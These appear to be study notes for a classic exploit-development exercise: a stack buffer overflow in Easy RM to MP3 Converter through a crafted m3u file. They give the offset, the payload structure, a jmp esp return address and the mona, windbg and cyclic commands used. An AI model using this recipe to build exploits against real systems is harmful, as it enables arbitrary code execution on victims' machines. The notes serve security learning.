- app/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
Fuzz load functionality for m3u files. There is crash when we send 30k garbage data. We locate the exact offset by sending unique patterns. We found the exact offset at 26100. Then we try set EIP to 0xdeadbeef to confirm EIP overwrite. After confirming the EIP overwrite, we create our payload as following payload = JUNK(26100 chars) + EIP + NOP_SLED(sizeof(char *) * 100) + shellcode(calc.exe)
We need "jmp esp" like functionality. We can find "jmp esp" in loaded modules(dlls). To do this we can run !mona modules in immunity debugger. After that, we need to pick a module which does not have ASLR and REBASE enabled. In our case, its shell32.dll which is a default operating system dll. We can find "jmp esp" inside shell32.dll by using following mona command: "!mona find -s '\xff\xe4' -m shell32.dll" (Alternatively we can use a command like this: !mona jmp -r esp -m MSRMfilter03.dll). Now we can set our controlled EIP to a address of "\xff\xe4" in this case, 0x7c9d31ef. When EIP encounters 0x7c9d31ef, it jumps onto stack after interpreting opcodes of the given adress. Now, EIP is on the nop_sled after finishes the nop sled it starts to execude our shellcode. Win.
In the exploits folder there is exploits written in different languages for demonstration purposes.
We can can create and detect patterns by using following:
PS D:\exploits\easyrmtomp3\exploits> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
PS D:\exploits\easyrmtomp3\exploits> cyclic -l "0x61617861"
91
jumping memory address is not a good idea especially if it contains nullbyte
jumping to esp is common in dlls,
a in windbg (assemble) jmp esp u given address
try to find jmp esp in application dll first | if we take from os dll it may differ from version to version s 01b10000 l 01fdd000 ff e4